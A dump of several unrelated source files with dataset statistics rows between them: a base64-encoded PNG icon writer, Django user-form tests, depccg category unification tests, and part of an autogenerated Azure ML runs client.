image_enconded = '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'
image_64_decode = base64.decodestring(image_enconded)
image_result = open(gt_fspy_icon_image, 'wb')
image_result.write(image_64_decode)
image_result.close()
# Generate Icons Without Imports
if __name__ == '__main__':
gt_generate_icons()
| 319.386364
| 7,692
| 0.9472
| 488
| 14,053
| 27.161885
| 0.776639
| 0.004979
| 0.003923
| 0.003848
| 0.024142
| 0.021426
| 0.017654
| 0.017654
| 0.017654
| 0.017654
| 0
| 0.148887
| 0.022131
| 14,053
| 44
| 7,693
| 319.386364
| 0.815675
| 0.023696
| 0
| 0.3
| 1
| 0.1
| 0.94193
| 0.939587
| 0
| 1
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.2
| 0
| 0.25
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
05d2f61964640f286688cd9a0273a18fb9bc24b7
| 1,448
|
py
|
Python
|
app/account/tests/test_forms.py
|
rogeriopaulos/gep
|
e56fd0450bdb8f572e2e35cc59a74ab0f0b372e2
|
[
"MIT"
] | null | null | null |
app/account/tests/test_forms.py
|
rogeriopaulos/gep
|
e56fd0450bdb8f572e2e35cc59a74ab0f0b372e2
|
[
"MIT"
] | 2
|
2021-09-02T04:22:45.000Z
|
2021-09-02T04:52:26.000Z
|
app/account/tests/test_forms.py
|
rogeriopaulos/gep
|
e56fd0450bdb8f572e2e35cc59a74ab0f0b372e2
|
[
"MIT"
] | 1
|
2021-09-15T02:16:38.000Z
|
2021-09-15T02:16:38.000Z
|
from account.forms import UserEditForm, UserForm
from account.tests.factories import UserFactory
from django.test import TestCase
class UserFormTestCase(TestCase):
def setUp(self):
self.usr = UserFactory()
self.data = {
'username': self.usr.username,
'first_name': self.usr.first_name,
'last_name': self.usr.last_name,
'email': self.usr.email,
'password': self.usr.password,
}
def test_operacao_repetida(self):
email_indisponivel_error_message = 'Já existe um usuário com este e-mail.'
form = UserForm(data=self.data)
self.assertFalse(form.is_valid())
form.clean()
self.assertIn(('email', [email_indisponivel_error_message]), form.errors.items())
class UserEditFormTestCase(TestCase):
def setUp(self):
self.usr = UserFactory()
self.data = {
'username': self.usr.username,
'first_name': self.usr.first_name,
'last_name': self.usr.last_name,
'email': self.usr.email,
'password': self.usr.password,
}
def test_operacao_repetida(self):
email_indisponivel_error_message = 'Já existe um usuário com este e-mail.'
form = UserEditForm(data=self.data)
self.assertFalse(form.is_valid())
form.clean()
self.assertIn(('email', [email_indisponivel_error_message]), form.errors.items())
| 30.166667
| 89
| 0.629834
| 165
| 1,448
| 5.369697
| 0.284848
| 0.094808
| 0.049661
| 0.130926
| 0.799097
| 0.799097
| 0.799097
| 0.799097
| 0.799097
| 0.799097
| 0
| 0
| 0.254834
| 1,448
| 47
| 90
| 30.808511
| 0.821131
| 0
| 0
| 0.742857
| 0
| 0
| 0.11326
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 1
| 0.114286
| false
| 0.057143
| 0.085714
| 0
| 0.257143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
05da192224eac26e9eb0375dc585d8cf5b9ec88c
| 2,277
|
py
|
Python
|
tests/test_unification.py
|
masashi-y/myccg
|
263fd0afa7a619626fc2d506016625b6068bb27b
|
[
"MIT"
] | 75
|
2017-05-01T09:32:56.000Z
|
2022-03-07T02:57:31.000Z
|
tests/test_unification.py
|
masashi-y/myccg
|
263fd0afa7a619626fc2d506016625b6068bb27b
|
[
"MIT"
] | 23
|
2017-05-10T08:28:57.000Z
|
2022-02-15T05:15:25.000Z
|
tests/test_unification.py
|
masashi-y/myccg
|
263fd0afa7a619626fc2d506016625b6068bb27b
|
[
"MIT"
] | 15
|
2017-05-08T13:02:33.000Z
|
2022-03-07T01:40:26.000Z
|
from depccg.cat import Category
from depccg.unification import Unification
import pytest
def test_basic():
uni = Unification("(((a/b)/c)/d)/e", "f")
x = Category.parse("(((a/b)/c)/d)/e")
y = Category.parse("f")
assert uni(x, y)
assert uni["a"] == "a"
assert uni["b"] == "b"
assert uni["c"] == "c"
assert uni["d"] == "d"
assert uni["e"] == "e"
assert uni["f"] == "f"
with pytest.raises(RuntimeError, match="cannot use the same *"):
uni(x, y)
def test_deep():
uni = Unification("a/b", "c")
x = Category.parse("(((a/b)/c)/d)/e")
y = Category.parse("f")
assert uni(x, y)
assert uni["a"] == "((a/b)/c)/d"
assert uni["b"] == "e"
assert uni["c"] == "f"
def test_english():
uni = Unification("a/b", "b")
x = Category.parse("S[X]/NP[X]")
y = Category.parse("NP[mod]")
assert uni(x, y)
assert uni["a"] == Category.parse('S[mod]')
def test_japanese():
uni = Unification("(a\\b)/c", "c")
x = Category.parse(
"(S[mod=nm,form=base,fin=f]\\S[mod=nm,form=base,fin=f])/S[mod=nm,form=base,fin=f]")
y = Category.parse("S[mod=nm,form=base,fin=f]")
assert uni(x, y)
assert uni["a"] == Category.parse("S[mod=nm,form=base,fin=f]")
assert uni["b"] == Category.parse("S[mod=nm,form=base,fin=f]")
assert uni["c"] == Category.parse("S[mod=nm,form=base,fin=f]")
# three variables
uni = Unification("(a\\b)/c", "c")
x = Category.parse(
"(S[mod=X1,form=X2,fin=X3]\\S[mod=X1,form=X2,fin=X3])/S[mod=X1,form=X2,fin=X3]")
y = Category.parse("S[mod=nm,form=base,fin=f]")
assert uni(x, y)
assert uni["a"] == Category.parse("S[mod=nm,form=base,fin=f]")
assert uni["b"] == Category.parse("S[mod=nm,form=base,fin=f]")
assert uni["c"] == Category.parse("S[mod=nm,form=base,fin=f]")
# only two variables
uni = Unification("(a\\b)/c", "c")
x = Category.parse(
"(S[mod=X1,form=X2,fin=f]\\S[mod=X1,form=X2,fin=f])/S[mod=X1,form=X2,fin=f]")
y = Category.parse("S[mod=nm,form=base,fin=f]")
assert uni(x, y)
assert uni["a"] == Category.parse("S[mod=nm,form=base,fin=f]")
assert uni["b"] == Category.parse("S[mod=nm,form=base,fin=f]")
assert uni["c"] == Category.parse("S[mod=nm,form=base,fin=f]")
| 33
| 91
| 0.564778
| 393
| 2,277
| 3.262087
| 0.117048
| 0.175507
| 0.185647
| 0.212168
| 0.74181
| 0.713729
| 0.713729
| 0.713729
| 0.713729
| 0.713729
| 0
| 0.008069
| 0.183575
| 2,277
| 68
| 92
| 33.485294
| 0.681549
| 0.014932
| 0
| 0.509091
| 0
| 0.054545
| 0.310714
| 0.237054
| 0
| 0
| 0
| 0
| 0.454545
| 1
| 0.072727
| false
| 0
| 0.054545
| 0
| 0.127273
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
af10c9628be38029042202345089da8e3ffc68d9
| 106,615
|
py
|
Python
|
sdk/ml/azure-ai-ml/azure/ai/ml/_restclient/runhistory/aio/operations/_runs_operations.py
|
dubiety/azure-sdk-for-python
|
62ffa839f5d753594cf0fe63668f454a9d87a346
|
[
"MIT"
] | 1
|
2022-02-01T18:50:12.000Z
|
2022-02-01T18:50:12.000Z
|
sdk/ml/azure-ai-ml/azure/ai/ml/_restclient/runhistory/aio/operations/_runs_operations.py
|
ellhe-blaster/azure-sdk-for-python
|
82193ba5e81cc5e5e5a5239bba58abe62e86f469
|
[
"MIT"
] | null | null | null |
sdk/ml/azure-ai-ml/azure/ai/ml/_restclient/runhistory/aio/operations/_runs_operations.py
|
ellhe-blaster/azure-sdk-for-python
|
82193ba5e81cc5e5e5a5239bba58abe62e86f469
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, List, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._runs_operations import build_add_or_modify_by_experiment_id_request, build_add_or_modify_by_experiment_name_request, build_add_or_modify_experiment_request, build_add_request, build_batch_add_or_modify_by_experiment_id_request, build_batch_add_or_modify_by_experiment_name_request, build_batch_get_run_data_request, build_cancel_run_with_uri_by_experiment_id_request, build_cancel_run_with_uri_by_experiment_name_request, build_delete_run_services_by_experiment_id_request, build_delete_run_services_by_experiment_name_request, build_delete_run_services_request, build_delete_tags_by_experiment_id_request, build_delete_tags_by_experiment_name_request, build_delete_tags_request, build_get_by_experiment_id_request, build_get_by_experiment_name_request, build_get_by_ids_by_experiment_id_request, build_get_by_ids_by_experiment_name_request, build_get_by_query_by_experiment_id_request, build_get_by_query_by_experiment_name_request, build_get_child_by_experiment_id_request, build_get_child_by_experiment_name_request, build_get_child_request, build_get_details_by_experiment_id_request, build_get_details_by_experiment_name_request, build_get_details_request, build_get_request, build_get_run_data_request, build_modify_or_delete_tags_by_experiment_id_request, build_modify_or_delete_tags_by_experiment_name_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RunsOperations:
"""RunsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.machinelearningservices.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def get_child_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_name: str,
filter: Optional[str] = None,
continuationtoken: Optional[str] = None,
orderby: Optional[List[str]] = None,
sortorder: Optional[Union[str, "_models.SortOrderDirection"]] = None,
top: Optional[int] = None,
count: Optional[bool] = None,
**kwargs: Any
) -> AsyncIterable["_models.PaginatedRunList"]:
"""get_child_by_experiment_name.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_name:
:type experiment_name: str
:param filter: Allows for filtering the collection of resources.
The expression specified is evaluated for each resource in the collection, and only items
where the expression evaluates to true are included in the response.
:type filter: str
:param continuationtoken: The continuation token to use for getting the next set of resources.
:type continuationtoken: str
:param orderby: The list of resource properties to use for sorting the requested resources.
:type orderby: list[str]
:param sortorder: The sort order of the returned resources. Not used, specify asc or desc after
each property name in the OrderBy parameter.
:type sortorder: str or ~azure.mgmt.machinelearningservices.models.SortOrderDirection
:param top: The maximum number of items in the resource collection to be included in the
result.
If not specified, all items are returned.
:type top: int
:param count: Whether to include a count of the matching resources along with the resources
returned in the response.
:type count: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PaginatedRunList or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.machinelearningservices.models.PaginatedRunList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PaginatedRunList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_get_child_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
filter=filter,
continuationtoken=continuationtoken,
orderby=orderby,
sortorder=sortorder,
top=top,
count=count,
template_url=self.get_child_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_get_child_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
filter=filter,
continuationtoken=continuationtoken,
orderby=orderby,
sortorder=sortorder,
top=top,
count=count,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PaginatedRunList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_child_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/{runId}/children'} # type: ignore
@distributed_trace
def get_child_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_id: str,
filter: Optional[str] = None,
continuationtoken: Optional[str] = None,
orderby: Optional[List[str]] = None,
sortorder: Optional[Union[str, "_models.SortOrderDirection"]] = None,
top: Optional[int] = None,
count: Optional[bool] = None,
**kwargs: Any
) -> AsyncIterable["_models.PaginatedRunList"]:
"""get_child_by_experiment_id.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_id:
:type experiment_id: str
:param filter: Allows for filtering the collection of resources.
The expression specified is evaluated for each resource in the collection, and only items
where the expression evaluates to true are included in the response.
:type filter: str
:param continuationtoken: The continuation token to use for getting the next set of resources.
:type continuationtoken: str
:param orderby: The list of resource properties to use for sorting the requested resources.
:type orderby: list[str]
:param sortorder: The sort order of the returned resources. Not used, specify asc or desc after
each property name in the OrderBy parameter.
:type sortorder: str or ~azure.mgmt.machinelearningservices.models.SortOrderDirection
:param top: The maximum number of items in the resource collection to be included in the
result.
If not specified, all items are returned.
:type top: int
:param count: Whether to include a count of the matching resources along with the resources
returned in the response.
:type count: bool
